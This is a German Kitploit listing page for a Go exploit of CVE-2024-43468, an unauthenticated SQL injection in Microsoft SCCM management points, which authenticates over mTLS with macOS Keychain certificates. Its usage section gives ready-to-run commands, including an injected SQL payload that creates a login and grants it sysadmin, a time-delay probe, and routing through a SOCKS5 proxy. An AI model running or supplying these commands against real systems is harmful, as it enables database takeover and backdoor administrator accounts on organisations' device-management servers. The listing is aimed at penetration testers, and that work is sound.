Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-43468_mTLS_go — CVE-2024-43468 SCCM SQL-Injection-Exploit (mTLS nicht extrahierbares Client-Zertifikat aus MacOS-Keychain-Version) | Kitploit
Tools/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungRed Teaming
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 SCCM SQL-Injection-Exploit (mTLS nicht extrahierbares Client-Zertifikat aus MacOS-Keychain-Version)

Repository anzeigen
32vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-43468 SCCM SQL Injection Exploit (mTLS-Client-Zertifikate aus macOS-Schlüsselbund-Version)

Go-Implementierung des CVE-2024-43468-Exploits, der den macOS-Schlüsselbund für die mTLS-Authentifizierung verwendet (ohne dass Schlüssel aus dem Schlüsselbund exportiert werden müssen).

Zusätzlich:

  • Proxy-Unterstützung hinzugefügt, um problematische proxychains zu vermeiden.
  • get_cert_name.py hinzugefügt, um den allgemeinen Namen des Zertifikats zu erhalten (ja, dies kann man auch manuell über die Keychain Access GUI tun).
  • Viel Debugging hinzugefügt, um zu sehen, was passiert.

Basiert auf:

  • Original Python-Exploit
  • mTLS Go-Client-Beispiel

Beschreibung

Nutzt nicht authentifizierte SQL-Injection-Schwachstellen im Microsoft Configuration Manager (ConfigMgr / SCCM) aus, die es einem Angreifer mit Netzwerkzugriff auf einen Management Point ermöglicht, beliebige SQL-Abfragen auf der Standortdatenbank auszuführen.

Verwundbare Versionen:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

Installation

root@kitploit:~
# Clone repository
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# Install dependencies
go get github.com/google/uuid
go get golang.org/x/net/proxy

# Build
go build -o sccm

Verwendung

root@kitploit:~
# Show help
./sccm -h

# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

Parameter

  • -t : Ziel-URL (erforderlich)
  • -sql : Auszuführende SQL-Abfrage (erforderlich)
  • -cn : Allgemeiner Name des Zertifikats im macOS-Schlüsselbund (erforderlich)
  • -proxy : SOCKS5-Proxy-Adresse (Standard: leer)

Voraussetzungen

  • macOS (für Schlüsselbund-Integration)
  • Go 1.16+
  • Client-Zertifikat im macOS-Schlüsselbund
  • optional: SOCKS5-Proxy

Referenzen

  • Microsoft-Hinweis
  • Synacktiv-Hinweis
  • mTLS Go-Client-Beispiel
Tool herunterladen